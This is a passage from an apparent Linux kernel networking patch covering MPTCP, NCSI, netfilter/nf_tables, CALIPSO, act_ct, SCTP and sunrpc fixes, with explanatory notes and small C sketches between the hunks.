+-	opt_mp_join = !!(mp_opt.suboptions & OPTIONS_MPTCP_MPJ);
++	opt_mp_capable = !!(mp_opt.suboptions & OPTION_MPTCP_MPC_ACK);
++	opt_mp_join = !!(mp_opt.suboptions & OPTION_MPTCP_MPJ_ACK);
+ 	if (opt_mp_capable && opt_mp_join)
+ 		return -EINVAL;
+ 
+@@ -415,7 +415,7 @@ static void subflow_finish_connect(struct sock *sk, const struct sk_buff *skb)
+ 
+ 	mptcp_get_options(skb, &mp_opt);
+ 	if (subflow->request_mptcp) {
+-		if (!(mp_opt.suboptions & OPTIONS_MPTCP_MPC)) {
++		if (!(mp_opt.suboptions & OPTION_MPTCP_MPC_SYNACK)) {
+ 			MPTCP_INC_STATS(sock_net(sk),
+ 					MPTCP_MIB_MPCAPABLEACTIVEFALLBACK);
+ 			mptcp_do_fallback(sk);
+@@ -438,7 +438,7 @@ static void subflow_finish_connect(struct sock *sk, const struct sk_buff *skb)
+ 	} else if (subflow->request_join) {
+ 		u8 hmac[SHA256_DIGEST_SIZE];
+ 
+-		if (!(mp_opt.suboptions & OPTIONS_MPTCP_MPJ)) {
++		if (!(mp_opt.suboptions & OPTION_MPTCP_MPJ_SYNACK)) {
+ 			subflow->reset_reason = MPTCP_RST_EMPTCP;
+ 			goto do_reset;
+ 		}
+@@ -713,12 +713,13 @@ static struct sock *subflow_syn_recv_sock(const struct sock *sk,
+ 		 * options.
+ 		 */
+ 		mptcp_get_options(skb, &mp_opt);
+-		if (!(mp_opt.suboptions & OPTIONS_MPTCP_MPC))
++		if (!(mp_opt.suboptions &
++		      (OPTION_MPTCP_MPC_SYN | OPTION_MPTCP_MPC_ACK)))
+ 			fallback = true;
+ 
+ 	} else if (subflow_req->mp_join) {
+ 		mptcp_get_options(skb, &mp_opt);
+-		if (!(mp_opt.suboptions & OPTIONS_MPTCP_MPJ) ||
++		if (!(mp_opt.suboptions & OPTION_MPTCP_MPJ_ACK) ||
+ 		    !subflow_hmac_valid(req, &mp_opt) ||
+ 		    !mptcp_can_accept_new_subflow(subflow_req->msk)) {
+ 			SUBFLOW_REQ_INC_STATS(req, MPTCP_MIB_JOINACKMAC);
+diff --git a/net/ncsi/internal.h b/net/ncsi/internal.h
+index 03757e76bb6b9..374412ed780b6 100644
+--- a/net/ncsi/internal.h
++++ b/net/ncsi/internal.h
+@@ -105,8 +105,11 @@ enum {
+ 
+ 
+ struct ncsi_channel_version {
+-	u32 version;		/* Supported BCD encoded NCSI version */
+-	u32 alpha2;		/* Supported BCD encoded NCSI version */
++	u8   major;		/* NCSI version major */
++	u8   minor;		/* NCSI version minor */
++	u8   update;		/* NCSI version update */
++	char alpha1;		/* NCSI version alpha1 */
++	char alpha2;		/* NCSI version alpha2 */
+ 	u8  fw_name[12];	/* Firmware name string                */
+ 	u32 fw_version;		/* Firmware version                   */
+ 	u16 pci_ids[4];		/* PCI identification                 */
+diff --git a/net/ncsi/ncsi-netlink.c b/net/ncsi/ncsi-netlink.c
+index d27f4eccce6d7..fe681680b5d91 100644
+--- a/net/ncsi/ncsi-netlink.c
++++ b/net/ncsi/ncsi-netlink.c
+@@ -71,8 +71,8 @@ static int ncsi_write_channel_info(struct sk_buff *skb,
+ 	if (nc == nc->package->preferred_channel)
+ 		nla_put_flag(skb, NCSI_CHANNEL_ATTR_FORCED);
+ 
+-	nla_put_u32(skb, NCSI_CHANNEL_ATTR_VERSION_MAJOR, nc->version.version);
+-	nla_put_u32(skb, NCSI_CHANNEL_ATTR_VERSION_MINOR, nc->version.alpha2);
++	nla_put_u32(skb, NCSI_CHANNEL_ATTR_VERSION_MAJOR, nc->version.major);
++	nla_put_u32(skb, NCSI_CHANNEL_ATTR_VERSION_MINOR, nc->version.minor);
+ 	nla_put_string(skb, NCSI_CHANNEL_ATTR_VERSION_STR, nc->version.fw_name);
+ 
+ 	vid_nest = nla_nest_start_noflag(skb, NCSI_CHANNEL_ATTR_VLAN_LIST);
+diff --git a/net/ncsi/ncsi-pkt.h b/net/ncsi/ncsi-pkt.h
+index ba66c7dc3a216..c9d1da34dc4dc 100644
+--- a/net/ncsi/ncsi-pkt.h
++++ b/net/ncsi/ncsi-pkt.h
+@@ -197,9 +197,12 @@ struct ncsi_rsp_gls_pkt {
+ /* Get Version ID */
+ struct ncsi_rsp_gvi_pkt {
+ 	struct ncsi_rsp_pkt_hdr rsp;          /* Response header */
+-	__be32                  ncsi_version; /* NCSI version    */
++	unsigned char           major;        /* NCSI version major */
++	unsigned char           minor;        /* NCSI version minor */
++	unsigned char           update;       /* NCSI version update */
++	unsigned char           alpha1;       /* NCSI version alpha1 */
+ 	unsigned char           reserved[3];  /* Reserved        */
+-	unsigned char           alpha2;       /* NCSI version    */
++	unsigned char           alpha2;       /* NCSI version alpha2 */
+ 	unsigned char           fw_name[12];  /* f/w name string */
+ 	__be32                  fw_version;   /* f/w version     */
+ 	__be16                  pci_ids[4];   /* PCI IDs         */
+diff --git a/net/ncsi/ncsi-rsp.c b/net/ncsi/ncsi-rsp.c
+index 069c2659074bc..480e80e3c2836 100644
+--- a/net/ncsi/ncsi-rsp.c
++++ b/net/ncsi/ncsi-rsp.c
+@@ -19,6 +19,19 @@
+ #include "ncsi-pkt.h"
+ #include "ncsi-netlink.h"
+ 
++/* Nibbles within [0xA, 0xF] add zero "0" to the returned value.
++ * Optional fields (encoded as 0xFF) will default to zero.
++ */
++static u8 decode_bcd_u8(u8 x)
++{
++	int lo = x & 0xF;
++	int hi = x >> 4;
++
++	lo = lo < 0xA ? lo : 0;
++	hi = hi < 0xA ? hi : 0;
++	return lo + hi * 10;
++}
++
+ static int ncsi_validate_rsp_pkt(struct ncsi_request *nr,
+ 				 unsigned short payload)
+ {
+@@ -755,9 +768,18 @@ static int ncsi_rsp_handler_gvi(struct ncsi_request *nr)
+ 	if (!nc)
+ 		return -ENODEV;
+ 
+-	/* Update to channel's version info */
++	/* Update channel's version info
++	 *
++	 * Major, minor, and update fields are supposed to be
++	 * unsigned integers encoded as packed BCD.
++	 *
++	 * Alpha1 and alpha2 are ISO/IEC 8859-1 characters.
++	 */
+ 	ncv = &nc->version;
+-	ncv->version = ntohl(rsp->ncsi_version);
++	ncv->major = decode_bcd_u8(rsp->major);
++	ncv->minor = decode_bcd_u8(rsp->minor);
++	ncv->update = decode_bcd_u8(rsp->update);
++	ncv->alpha1 = rsp->alpha1;
+ 	ncv->alpha2 = rsp->alpha2;
+ 	memcpy(ncv->fw_name, rsp->fw_name, 12);
+ 	ncv->fw_version = ntohl(rsp->fw_version);
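
A quick standalone check of decode_bcd_u8() above confirms the comment: any nibble in [0xA, 0xF] contributes zero, so the all-ones "field not supported" encoding decodes to 0 rather than garbage. The function body is copied verbatim from the hunk; main() is just a harness:

#include <stdio.h>
#include <stdint.h>

static uint8_t decode_bcd_u8(uint8_t x)
{
	int lo = x & 0xF;
	int hi = x >> 4;

	lo = lo < 0xA ? lo : 0;
	hi = hi < 0xA ? hi : 0;
	return lo + hi * 10;
}

int main(void)
{
	printf("%u\n", decode_bcd_u8(0x37)); /* 37: ordinary packed BCD */
	printf("%u\n", decode_bcd_u8(0xF1)); /* 1: high nibble out of range */
	printf("%u\n", decode_bcd_u8(0xFF)); /* 0: optional field absent */
	return 0;
}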
+diff --git a/net/netfilter/ipset/ip_set_hash_netiface.c b/net/netfilter/ipset/ip_set_hash_netiface.c
+index 0310732862362..bf1a3851ba5a7 100644
+--- a/net/netfilter/ipset/ip_set_hash_netiface.c
++++ b/net/netfilter/ipset/ip_set_hash_netiface.c
+@@ -138,9 +138,9 @@ hash_netiface4_data_next(struct hash_netiface4_elem *next,
+ #include "ip_set_hash_gen.h"
+ 
+ #if IS_ENABLED(CONFIG_BRIDGE_NETFILTER)
+-static const char *get_physindev_name(const struct sk_buff *skb)
++static const char *get_physindev_name(const struct sk_buff *skb, struct net *net)
+ {
+-	struct net_device *dev = nf_bridge_get_physindev(skb);
++	struct net_device *dev = nf_bridge_get_physindev(skb, net);
+ 
+ 	return dev ? dev->name : NULL;
+ }
+@@ -177,7 +177,7 @@ hash_netiface4_kadt(struct ip_set *set, const struct sk_buff *skb,
+ 
+ 	if (opt->cmdflags & IPSET_FLAG_PHYSDEV) {
+ #if IS_ENABLED(CONFIG_BRIDGE_NETFILTER)
+-		const char *eiface = SRCDIR ? get_physindev_name(skb) :
++		const char *eiface = SRCDIR ? get_physindev_name(skb, xt_net(par)) :
+ 					      get_physoutdev_name(skb);
+ 
+ 		if (!eiface)
+@@ -395,7 +395,7 @@ hash_netiface6_kadt(struct ip_set *set, const struct sk_buff *skb,
+ 
+ 	if (opt->cmdflags & IPSET_FLAG_PHYSDEV) {
+ #if IS_ENABLED(CONFIG_BRIDGE_NETFILTER)
+-		const char *eiface = SRCDIR ? get_physindev_name(skb) :
++		const char *eiface = SRCDIR ? get_physindev_name(skb, xt_net(par)) :
+ 					      get_physoutdev_name(skb);
+ 
+ 		if (!eiface)
+diff --git a/net/netfilter/ipvs/ip_vs_xmit.c b/net/netfilter/ipvs/ip_vs_xmit.c
+index b452eb3ddcecb..d40a4ca2b27f5 100644
+--- a/net/netfilter/ipvs/ip_vs_xmit.c
++++ b/net/netfilter/ipvs/ip_vs_xmit.c
+@@ -271,7 +271,7 @@ static inline bool decrement_ttl(struct netns_ipvs *ipvs,
+ 			skb->dev = dst->dev;
+ 			icmpv6_send(skb, ICMPV6_TIME_EXCEED,
+ 				    ICMPV6_EXC_HOPLIMIT, 0);
+-			__IP6_INC_STATS(net, idev, IPSTATS_MIB_INHDRERRORS);
++			IP6_INC_STATS(net, idev, IPSTATS_MIB_INHDRERRORS);
+ 
+ 			return false;
+ 		}
+@@ -286,7 +286,7 @@ static inline bool decrement_ttl(struct netns_ipvs *ipvs,
+ 	{
+ 		if (ip_hdr(skb)->ttl <= 1) {
+ 			/* Tell the sender its packet died... */
+-			__IP_INC_STATS(net, IPSTATS_MIB_INHDRERRORS);
++			IP_INC_STATS(net, IPSTATS_MIB_INHDRERRORS);
+ 			icmp_send(skb, ICMP_TIME_EXCEEDED, ICMP_EXC_TTL, 0);
+ 			return false;
+ 		}
+diff --git a/net/netfilter/nf_log_syslog.c b/net/netfilter/nf_log_syslog.c
+index c66689ad2b491..58402226045e8 100644
+--- a/net/netfilter/nf_log_syslog.c
++++ b/net/netfilter/nf_log_syslog.c
+@@ -111,7 +111,8 @@ nf_log_dump_packet_common(struct nf_log_buf *m, u8 pf,
+ 			  unsigned int hooknum, const struct sk_buff *skb,
+ 			  const struct net_device *in,
+ 			  const struct net_device *out,
+-			  const struct nf_loginfo *loginfo, const char *prefix)
++			  const struct nf_loginfo *loginfo, const char *prefix,
++			  struct net *net)
+ {
+ 	const struct net_device *physoutdev __maybe_unused;
+ 	const struct net_device *physindev __maybe_unused;
+@@ -121,7 +122,7 @@ nf_log_dump_packet_common(struct nf_log_buf *m, u8 pf,
+ 			in ? in->name : "",
+ 			out ? out->name : "");
+ #if IS_ENABLED(CONFIG_BRIDGE_NETFILTER)
+-	physindev = nf_bridge_get_physindev(skb);
++	physindev = nf_bridge_get_physindev(skb, net);
+ 	if (physindev && in != physindev)
+ 		nf_log_buf_add(m, "PHYSIN=%s ", physindev->name);
+ 	physoutdev = nf_bridge_get_physoutdev(skb);
+@@ -148,7 +149,7 @@ static void nf_log_arp_packet(struct net *net, u_int8_t pf,
+ 		loginfo = &default_loginfo;
+ 
+ 	nf_log_dump_packet_common(m, pf, hooknum, skb, in, out, loginfo,
+-				  prefix);
++				  prefix, net);
+ 	dump_arp_packet(m, loginfo, skb, skb_network_offset(skb));
+ 
+ 	nf_log_buf_close(m);
+@@ -845,7 +846,7 @@ static void nf_log_ip_packet(struct net *net, u_int8_t pf,
+ 		loginfo = &default_loginfo;
+ 
+ 	nf_log_dump_packet_common(m, pf, hooknum, skb, in,
+-				  out, loginfo, prefix);
++				  out, loginfo, prefix, net);
+ 
+ 	if (in)
+ 		dump_mac_header(m, loginfo, skb);
+@@ -880,7 +881,7 @@ static void nf_log_ip6_packet(struct net *net, u_int8_t pf,
+ 		loginfo = &default_loginfo;
+ 
+ 	nf_log_dump_packet_common(m, pf, hooknum, skb, in, out,
+-				  loginfo, prefix);
++				  loginfo, prefix, net);
+ 
+ 	if (in)
+ 		dump_mac_header(m, loginfo, skb);
+@@ -916,7 +917,7 @@ static void nf_log_unknown_packet(struct net *net, u_int8_t pf,
+ 		loginfo = &default_loginfo;
+ 
+ 	nf_log_dump_packet_common(m, pf, hooknum, skb, in, out, loginfo,
+-				  prefix);
++				  prefix, net);
+ 
+ 	dump_mac_header(m, loginfo, skb);
+ 
+diff --git a/net/netfilter/nf_queue.c b/net/netfilter/nf_queue.c
+index 63d1516816b1f..e2f334f70281f 100644
+--- a/net/netfilter/nf_queue.c
++++ b/net/netfilter/nf_queue.c
+@@ -82,11 +82,9 @@ static void __nf_queue_entry_init_physdevs(struct nf_queue_entry *entry)
+ {
+ #if IS_ENABLED(CONFIG_BRIDGE_NETFILTER)
+ 	const struct sk_buff *skb = entry->skb;
+-	struct nf_bridge_info *nf_bridge;
+ 
+-	nf_bridge = nf_bridge_info_get(skb);
+-	if (nf_bridge) {
+-		entry->physin = nf_bridge_get_physindev(skb);
++	if (nf_bridge_info_exists(skb)) {
++		entry->physin = nf_bridge_get_physindev(skb, entry->state.net);
+ 		entry->physout = nf_bridge_get_physoutdev(skb);
+ 	} else {
+ 		entry->physin = NULL;
+diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
+index 3d6ebb9877a4e..2702294ac46c6 100644
+--- a/net/netfilter/nf_tables_api.c
++++ b/net/netfilter/nf_tables_api.c
+@@ -4523,8 +4523,8 @@ static int nft_set_desc_concat_parse(const struct nlattr *attr,
+ static int nft_set_desc_concat(struct nft_set_desc *desc,
+ 			       const struct nlattr *nla)
+ {
++	u32 num_regs = 0, key_num_regs = 0;
+ 	struct nlattr *attr;
+-	u32 num_regs = 0;
+ 	int rem, err, i;
+ 
+ 	nla_for_each_nested(attr, nla, rem) {
+@@ -4539,6 +4539,10 @@ static int nft_set_desc_concat(struct nft_set_desc *desc,
+ 	for (i = 0; i < desc->field_count; i++)
+ 		num_regs += DIV_ROUND_UP(desc->field_len[i], sizeof(u32));
+ 
++	key_num_regs = DIV_ROUND_UP(desc->klen, sizeof(u32));
++	if (key_num_regs != num_regs)
++		return -EINVAL;
++
+ 	if (num_regs > NFT_REG32_COUNT)
+ 		return -E2BIG;
+ 
+@@ -4753,16 +4757,28 @@ static int nf_tables_newset(struct sk_buff *skb, const struct nfnl_info *info,
+ 	}
+ 
+ 	desc.policy = NFT_SET_POL_PERFORMANCE;
+-	if (nla[NFTA_SET_POLICY] != NULL)
++	if (nla[NFTA_SET_POLICY] != NULL) {
+ 		desc.policy = ntohl(nla_get_be32(nla[NFTA_SET_POLICY]));
++		switch (desc.policy) {
++		case NFT_SET_POL_PERFORMANCE:
++		case NFT_SET_POL_MEMORY:
++			break;
++		default:
++			return -EOPNOTSUPP;
++		}
++	}
+ 
+ 	if (nla[NFTA_SET_DESC] != NULL) {
+ 		err = nf_tables_set_desc_parse(&desc, nla[NFTA_SET_DESC]);
+ 		if (err < 0)
+ 			return err;
+ 
+-		if (desc.field_count > 1 && !(flags & NFT_SET_CONCAT))
++		if (desc.field_count > 1) {
++			if (!(flags & NFT_SET_CONCAT))
++				return -EINVAL;
++		} else if (flags & NFT_SET_CONCAT) {
+ 			return -EINVAL;
++		}
+ 	} else if (flags & NFT_SET_CONCAT) {
+ 		return -EINVAL;
+ 	}
+@@ -5406,7 +5422,7 @@ static int nf_tables_dump_setelem(const struct nft_ctx *ctx,
+ 	const struct nft_set_ext *ext = nft_set_elem_ext(set, elem->priv);
+ 	struct nft_set_dump_args *args;
+ 
+-	if (nft_set_elem_expired(ext))
++	if (nft_set_elem_expired(ext) || nft_set_elem_is_dead(ext))
+ 		return 0;
+ 
+ 	args = container_of(iter, struct nft_set_dump_args, iter);
+@@ -6152,7 +6168,7 @@ static int nft_setelem_catchall_deactivate(const struct net *net,
+ 
+ 	list_for_each_entry(catchall, &set->catchall_list, list) {
+ 		ext = nft_set_elem_ext(set, catchall->elem);
+-		if (!nft_is_active(net, ext))
++		if (!nft_is_active_next(net, ext))
+ 			continue;
+ 
+ 		kfree(elem->priv);
+@@ -9937,6 +9953,7 @@ static int __nf_tables_abort(struct net *net, enum nfnl_abort_action action)
+ 				nft_trans_destroy(trans);
+ 				break;
+ 			}
++			nft_trans_set(trans)->dead = 1;
+ 			list_del_rcu(&nft_trans_set(trans)->list);
+ 			break;
+ 		case NFT_MSG_DELSET:
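
The nft_set_desc_concat() check added above requires the per-field register counts to add up to the key's own register count: each concatenated field occupies DIV_ROUND_UP(len, 4) 32-bit registers, and the sum must equal DIV_ROUND_UP(klen, 4), capped at NFT_REG32_COUNT. A standalone sketch of that arithmetic (the constant is an illustrative stand-in, not taken from the kernel headers):

#include <stdio.h>
#include <stdint.h>

#define NFT_REG32_COUNT	20	/* illustrative register-file size */
#define DIV_ROUND_UP(n, d)	(((n) + (d) - 1) / (d))

/* Mirrors the -EINVAL/-E2BIG paths of nft_set_desc_concat(). */
static int check_concat_desc(const uint8_t *field_len,
			     unsigned int field_count, unsigned int klen)
{
	unsigned int num_regs = 0, key_num_regs, i;

	for (i = 0; i < field_count; i++)
		num_regs += DIV_ROUND_UP(field_len[i], sizeof(uint32_t));

	key_num_regs = DIV_ROUND_UP(klen, sizeof(uint32_t));
	if (key_num_regs != num_regs)
		return -1;	/* fields don't add up to the key: -EINVAL */
	if (num_regs > NFT_REG32_COUNT)
		return -2;	/* wider than the register file: -E2BIG */
	return 0;
}

int main(void)
{
	uint8_t fields[] = { 4, 2 };	/* e.g. IPv4 address . port */

	printf("%d\n", check_concat_desc(fields, 2, 8));  /* 0: consistent */
	printf("%d\n", check_concat_desc(fields, 2, 16)); /* -1: mismatch  */
	return 0;
}
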
+diff --git a/net/netfilter/nfnetlink_log.c b/net/netfilter/nfnetlink_log.c
+index c5ff699e30469..200a82a8f943d 100644
+--- a/net/netfilter/nfnetlink_log.c
++++ b/net/netfilter/nfnetlink_log.c
+@@ -499,7 +499,7 @@ __build_packet_message(struct nfnl_log_net *log,
+ 					 htonl(br_port_get_rcu(indev)->br->dev->ifindex)))
+ 				goto nla_put_failure;
+ 		} else {
+-			struct net_device *physindev;
++			int physinif;
+ 
+ 			/* Case 2: indev is bridge group, we need to look for
+ 			 * physical device (when called from ipv4) */
+@@ -507,10 +507,10 @@ __build_packet_message(struct nfnl_log_net *log,
+ 					 htonl(indev->ifindex)))
+ 				goto nla_put_failure;
+ 
+-			physindev = nf_bridge_get_physindev(skb);
+-			if (physindev &&
++			physinif = nf_bridge_get_physinif(skb);
++			if (physinif &&
+ 			    nla_put_be32(inst->skb, NFULA_IFINDEX_PHYSINDEV,
+-					 htonl(physindev->ifindex)))
++					 htonl(physinif)))
+ 				goto nla_put_failure;
+ 		}
+ #endif
+diff --git a/net/netfilter/nft_limit.c b/net/netfilter/nft_limit.c
+index 981addb2d0515..75c05ef885a91 100644
+--- a/net/netfilter/nft_limit.c
++++ b/net/netfilter/nft_limit.c
+@@ -58,6 +58,7 @@ static inline bool nft_limit_eval(struct nft_limit_priv *priv, u64 cost)
+ static int nft_limit_init(struct nft_limit_priv *priv,
+ 			  const struct nlattr * const tb[], bool pkts)
+ {
++	bool invert = false;
+ 	u64 unit, tokens;
+ 
+ 	if (tb[NFTA_LIMIT_RATE] == NULL ||
+@@ -90,19 +91,23 @@ static int nft_limit_init(struct nft_limit_priv *priv,
+ 				 priv->rate);
+ 	}
+ 
++	if (tb[NFTA_LIMIT_FLAGS]) {
++		u32 flags = ntohl(nla_get_be32(tb[NFTA_LIMIT_FLAGS]));
++
++		if (flags & ~NFT_LIMIT_F_INV)
++			return -EOPNOTSUPP;
++
++		if (flags & NFT_LIMIT_F_INV)
++			invert = true;
++	}
++
+ 	priv->limit = kmalloc(sizeof(*priv->limit), GFP_KERNEL_ACCOUNT);
+ 	if (!priv->limit)
+ 		return -ENOMEM;
+ 
+ 	priv->limit->tokens = tokens;
+ 	priv->tokens_max = priv->limit->tokens;
+-
+-	if (tb[NFTA_LIMIT_FLAGS]) {
+-		u32 flags = ntohl(nla_get_be32(tb[NFTA_LIMIT_FLAGS]));
+-
+-		if (flags & NFT_LIMIT_F_INV)
+-			priv->invert = true;
+-	}
++	priv->invert = invert;
+ 	priv->limit->last = ktime_get_ns();
+ 	spin_lock_init(&priv->limit->lock);
+ 
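
The nft_limit_init() change above does two things: unknown NFTA_LIMIT_FLAGS bits now fail with -EOPNOTSUPP instead of being silently ignored, and the flags are parsed before the kmalloc() so the new error path cannot leak the allocation. The validate-before-allocate ordering in isolation, with illustrative names:

#include <stdlib.h>
#include <errno.h>

#define LIMIT_F_INV	(1 << 0)	/* the only supported flag */

struct limit_state {
	int invert;
	/* ... token-bucket fields ... */
};

static int limit_init(struct limit_state **out, unsigned int flags)
{
	int invert = 0;

	if (flags & ~LIMIT_F_INV)	/* validate first ... */
		return -EOPNOTSUPP;
	if (flags & LIMIT_F_INV)
		invert = 1;

	*out = malloc(sizeof(**out));	/* ... allocate second */
	if (!*out)
		return -ENOMEM;
	(*out)->invert = invert;
	return 0;
}
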
+diff --git a/net/netfilter/xt_physdev.c b/net/netfilter/xt_physdev.c
+index ec6ed6fda96c5..343e65f377d44 100644
+--- a/net/netfilter/xt_physdev.c
++++ b/net/netfilter/xt_physdev.c
+@@ -59,7 +59,7 @@ physdev_mt(const struct sk_buff *skb, struct xt_action_param *par)
+ 	    (!!outdev ^ !(info->invert & XT_PHYSDEV_OP_BRIDGED)))
+ 		return false;
+ 
+-	physdev = nf_bridge_get_physindev(skb);
++	physdev = nf_bridge_get_physindev(skb, xt_net(par));
+ 	indev = physdev ? physdev->name : NULL;
+ 
+ 	if ((info->bitmask & XT_PHYSDEV_OP_ISIN &&
+diff --git a/net/netlabel/netlabel_calipso.c b/net/netlabel/netlabel_calipso.c
+index f1d5b84652178..a07c2216d28b6 100644
+--- a/net/netlabel/netlabel_calipso.c
++++ b/net/netlabel/netlabel_calipso.c
+@@ -54,6 +54,28 @@ static const struct nla_policy calipso_genl_policy[NLBL_CALIPSO_A_MAX + 1] = {
+ 	[NLBL_CALIPSO_A_MTYPE] = { .type = NLA_U32 },
+ };
+ 
++static const struct netlbl_calipso_ops *calipso_ops;
++
++/**
++ * netlbl_calipso_ops_register - Register the CALIPSO operations
++ * @ops: ops to register
++ *
++ * Description:
++ * Register the CALIPSO packet engine operations.
++ *
++ */
++const struct netlbl_calipso_ops *
++netlbl_calipso_ops_register(const struct netlbl_calipso_ops *ops)
++{
++	return xchg(&calipso_ops, ops);
++}
++EXPORT_SYMBOL(netlbl_calipso_ops_register);
++
++static const struct netlbl_calipso_ops *netlbl_calipso_ops_get(void)
++{
++	return READ_ONCE(calipso_ops);
++}
++
+ /* NetLabel Command Handlers
+  */
+ /**
+@@ -96,15 +118,18 @@ static int netlbl_calipso_add_pass(struct genl_info *info,
+  *
+  */
+ static int netlbl_calipso_add(struct sk_buff *skb, struct genl_info *info)
+-
+ {
+ 	int ret_val = -EINVAL;
+ 	struct netlbl_audit audit_info;
++	const struct netlbl_calipso_ops *ops = netlbl_calipso_ops_get();
+ 
+ 	if (!info->attrs[NLBL_CALIPSO_A_DOI] ||
+ 	    !info->attrs[NLBL_CALIPSO_A_MTYPE])
+ 		return -EINVAL;
+ 
++	if (!ops)
++		return -EOPNOTSUPP;
++
+ 	netlbl_netlink_auditinfo(&audit_info);
+ 	switch (nla_get_u32(info->attrs[NLBL_CALIPSO_A_MTYPE])) {
+ 	case CALIPSO_MAP_PASS:
+@@ -363,28 +388,6 @@ int __init netlbl_calipso_genl_init(void)
+ 	return genl_register_family(&netlbl_calipso_gnl_family);
+ }
+ 
+-static const struct netlbl_calipso_ops *calipso_ops;
+-
+-/**
+- * netlbl_calipso_ops_register - Register the CALIPSO operations
+- * @ops: ops to register
+- *
+- * Description:
+- * Register the CALIPSO packet engine operations.
+- *
+- */
+-const struct netlbl_calipso_ops *
+-netlbl_calipso_ops_register(const struct netlbl_calipso_ops *ops)
+-{
+-	return xchg(&calipso_ops, ops);
+-}
+-EXPORT_SYMBOL(netlbl_calipso_ops_register);
+-
+-static const struct netlbl_calipso_ops *netlbl_calipso_ops_get(void)
+-{
+-	return READ_ONCE(calipso_ops);
+-}
+-
+ /**
+  * calipso_doi_add - Add a new DOI to the CALIPSO protocol engine
+  * @doi_def: the DOI structure
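
Moving the ops pointer and its accessors above the command handlers lets netlbl_calipso_add() check for a registered CALIPSO engine and fail with -EOPNOTSUPP instead of dereferencing a NULL ops table. A userspace sketch of the same publish/consume pattern, with C11 atomics standing in for the kernel's xchg()/READ_ONCE():

#include <stdatomic.h>
#include <errno.h>

struct calipso_ops {
	int (*doi_add)(int doi);
};

static _Atomic(const struct calipso_ops *) calipso_ops;

static const struct calipso_ops *
ops_register(const struct calipso_ops *ops)
{
	return atomic_exchange(&calipso_ops, ops);	/* like xchg() */
}

static const struct calipso_ops *ops_get(void)
{
	return atomic_load_explicit(&calipso_ops, memory_order_relaxed);
}

static int calipso_add(int doi)
{
	const struct calipso_ops *ops = ops_get();

	if (!ops)
		return -EOPNOTSUPP;	/* engine not loaded yet */
	return ops->doi_add(doi);
}

static int add_pass(int doi) { (void)doi; return 0; }
static const struct calipso_ops pass_ops = { .doi_add = add_pass };

int main(void)
{
	int before = calipso_add(1);	/* -EOPNOTSUPP: nothing registered */

	ops_register(&pass_ops);
	return !(before == -EOPNOTSUPP && calipso_add(1) == 0);
}
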
+diff --git a/net/sched/act_ct.c b/net/sched/act_ct.c
+index d6d33f854050a..84e15116f18c2 100644
+--- a/net/sched/act_ct.c
++++ b/net/sched/act_ct.c
+@@ -863,7 +863,6 @@ static int tcf_ct_handle_fragments(struct net *net, struct sk_buff *skb,
+ 	if (err || !frag)
+ 		return err;
+ 
+-	skb_get(skb);
+ 	mru = tc_skb_cb(skb)->mru;
+ 
+ 	if (family == NFPROTO_IPV4) {
+@@ -1150,12 +1149,8 @@ static int tcf_ct_act(struct sk_buff *skb, const struct tc_action *a,
+ 	nh_ofs = skb_network_offset(skb);
+ 	skb_pull_rcsum(skb, nh_ofs);
+ 	err = tcf_ct_handle_fragments(net, skb, family, p->zone, &defrag);
+-	if (err == -EINPROGRESS) {
+-		retval = TC_ACT_STOLEN;
+-		goto out_clear;
+-	}
+ 	if (err)
+-		goto drop;
++		goto out_frag;
+ 
+ 	err = tcf_ct_skb_network_trim(skb, family);
+ 	if (err)
+@@ -1226,6 +1221,11 @@ out_clear:
+ 		qdisc_skb_cb(skb)->pkt_len = skb->len;
+ 	return retval;
+ 
++out_frag:
++	if (err != -EINPROGRESS)
++		tcf_action_inc_drop_qstats(&c->common);
++	return TC_ACT_CONSUMED;
++
+ drop:
+ 	tcf_action_inc_drop_qstats(&c->common);
+ 	return TC_ACT_SHOT;
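
The tcf_ct_act() rework above funnels every defragmentation failure through one out_frag label: a packet stolen by the defrag queue (-EINPROGRESS) is consumed without touching the drop counter, any other error counts as a drop, and both cases return TC_ACT_CONSUMED because the skb no longer belongs to the caller (which is also why the skb_get() could go). The routing reduced to a pure function:

#include <errno.h>

enum { TC_ACT_CONSUMED = 7 };	/* illustrative value, not the uapi one */

struct stats { unsigned long drops; };

/* err is the negative return of the defrag step */
static int handle_frag_err(int err, struct stats *st)
{
	if (err != -EINPROGRESS)	/* stolen-by-defrag is not a drop */
		st->drops++;
	return TC_ACT_CONSUMED;		/* caller no longer owns the skb */
}
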
+diff --git a/net/sctp/socket.c b/net/sctp/socket.c
+index e25dc17091311..237a6b04adf6f 100644
+--- a/net/sctp/socket.c
++++ b/net/sctp/socket.c
+@@ -2098,6 +2098,13 @@ static int sctp_recvmsg(struct sock *sk, struct msghdr *msg, size_t len,
+ 	pr_debug("%s: sk:%p, msghdr:%p, len:%zd, flags:0x%x, addr_len:%p)\n",
+ 		 __func__, sk, msg, len, flags, addr_len);
+ 
++	if (unlikely(flags & MSG_ERRQUEUE))
++		return inet_recv_error(sk, msg, len, addr_len);
++
++	if (sk_can_busy_loop(sk) &&
++	    skb_queue_empty_lockless(&sk->sk_receive_queue))
++		sk_busy_loop(sk, flags & MSG_DONTWAIT);
++
+ 	lock_sock(sk);
+ 
+ 	if (sctp_style(sk, TCP) && !sctp_sstate(sk, ESTABLISHED) &&
+@@ -9038,12 +9045,6 @@ struct sk_buff *sctp_skb_recv_datagram(struct sock *sk, int flags, int *err)
+ 		if (sk->sk_shutdown & RCV_SHUTDOWN)
+ 			break;
+ 
+-		if (sk_can_busy_loop(sk)) {
+-			sk_busy_loop(sk, flags & MSG_DONTWAIT);
+-
+-			if (!skb_queue_empty_lockless(&sk->sk_receive_queue))
+-				continue;
+-		}
+ 
+ 		/* User doesn't want to wait.  */
+ 		error = -EAGAIN;
+diff --git a/net/sunrpc/xprtmultipath.c b/net/sunrpc/xprtmultipath.c
+index 701250b305dba..74ee2271251e3 100644
+--- a/net/sunrpc/xprtmultipath.c
++++ b/net/sunrpc/xprtmultipath.c
+@@ -284,7 +284,7 @@ struct rpc_xprt *_xprt_switch_find_current_entry(struct list_head *head,
+ 		if (cur == pos)
+ 			found = true;
+ 		if (found && ((find_active && xprt_is_active(pos)) ||
+-			      (!find_active && xprt_is_active(pos))))
++			      (!find_active && !xprt_is_active(pos))))
+ 			return pos;
+ 	}
+ 	return NULL;
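
The one-character fix above is easiest to see with the predicate pulled out: the intent is "return the entry whose active state matches what the caller asked for", but both branches tested xprt_is_active(), so a search with find_active=false could never succeed. Reduced to its logic:

#include <stdbool.h>

static bool state_matches(bool find_active, bool is_active)
{
	/* the corrected expression from the hunk above ... */
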